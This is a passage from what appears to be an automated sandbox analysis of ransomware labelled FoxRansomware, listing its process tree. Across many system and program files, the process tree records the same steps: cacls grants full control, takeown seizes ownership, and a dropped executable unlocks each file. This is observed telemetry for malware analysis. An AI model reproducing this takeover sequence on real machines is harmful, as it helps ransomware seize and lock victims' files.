- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
    3⤵
    - Modifies file permissions
    PID:5148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:5196
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:5200
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2356
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:1992
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
    3⤵
    PID:5584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1224
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:1472
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
  2⤵
  - Loads dropped DLL
  PID:4904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
    3⤵
    PID:3212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MahjongMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:5100
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "MahjongMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:2200
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1688
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""
  2⤵
  - Loads dropped DLL
  PID:1136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
    3⤵
    - Modifies file permissions
    PID:2984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "cryptocme2.sig" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2072
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "cryptocme2.sig" -nobanner
      4⤵
      Executes dropped EXE
      PID:2476
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""
  2⤵
  - Loads dropped DLL
  PID:1608
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"
    3⤵
    - Modifies file permissions
    PID:3112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "pmd.cer" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1084
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "pmd.cer" -nobanner
      4⤵
      Executes dropped EXE
      PID:2276
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2636
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""
  2⤵
  - Loads dropped DLL
  PID:1672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "email_initiator.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2696
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "email_initiator.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:2452
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2420
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""
  2⤵
  - Loads dropped DLL
  PID:3196
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C
    3⤵
    PID:3944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"
    3⤵
    - Modifies file permissions
    PID:3240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "pdf.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3236
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "pdf.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:2168
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1184
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""
  2⤵
  - Loads dropped DLL
  PID:3252
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C
    3⤵
    PID:3364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"
    3⤵
    PID:3428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "server_issue.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3424
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "server_issue.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:3496
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3552
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""
  2⤵
  - Loads dropped DLL
  PID:3504
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"
    3⤵
    - Modifies file permissions
    PID:3004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1148
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1692
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""
  2⤵
  - Loads dropped DLL
  PID:1676
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C
    3⤵
    PID:3120
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"
    3⤵
    PID:3140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CourierStd.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3148
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "CourierStd.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:2332
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""
  2⤵
  - Loads dropped DLL
  PID:280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C
    3⤵
    PID:656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"
    3⤵
    PID:3176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "zx______.pfm" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4428
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "zx______.pfm" -nobanner
      4⤵
      Executes dropped EXE
      PID:5676
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5672
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""
  2⤵
  - Loads dropped DLL
  PID:4480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C
    3⤵
    PID:4424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"
    3⤵
    - Modifies file permissions
    PID:4028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4564
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
      4⤵
      Executes dropped EXE
      PID:3360
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""
  2⤵
  - Loads dropped DLL
  PID:4580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C
    3⤵
    PID:4692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"
    3⤵
    PID:4732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "can32.clx" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4736
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "can32.clx" -nobanner
      4⤵
      Executes dropped EXE
      PID:4744
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4040
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""
  2⤵
  - Loads dropped DLL
  PID:5740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C
    3⤵
    PID:3568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"
    3⤵
    - Modifies file permissions
    PID:4032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "symbol.txt" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4508
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "symbol.txt" -nobanner
      4⤵
      Executes dropped EXE
      PID:4504
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""
  2⤵
  - Loads dropped DLL
  PID:3684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C
    3⤵
    PID:5652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SYMBOL.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:5240
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "SYMBOL.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:5552
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""
  2⤵
  - Loads dropped DLL
  PID:3736
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C
    3⤵
    PID:4712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "PurblePlaceMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3716
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "PurblePlaceMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:5596
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3768
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""
  2⤵
  - Loads dropped DLL
  PID:3172
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:3808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SolitaireMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2412
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "SolitaireMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:3168
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3892
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""
  2⤵
  - Loads dropped DLL
  PID:3220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:5748
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:4160
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  2⤵
  - Loads dropped DLL
  PID:5708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:4264
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "behavior.xml" -nobanner
    3⤵
    - Loads dropped DLL
    PID:5720
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "behavior.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:5788
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  2⤵
  - Loads dropped DLL
  PID:5824
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4584
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:5956
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat""
  2⤵
  - Loads dropped DLL
  PID:4140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C
    3⤵
    PID:4184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"
    3⤵
    PID:4200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "qmgr1.dat" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4208
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "qmgr1.dat" -nobanner
      4⤵
      Executes dropped EXE
      PID:4216
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4248
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  - Loads dropped DLL
  PID:4228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:4456
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "device.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:6132
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "device.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:4276
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  - Loads dropped DLL
  PID:4304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:6140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2280
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2468
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1772
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
  2⤵
  - Loads dropped DLL
  PID:824
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "tasks.xml" -nobanner
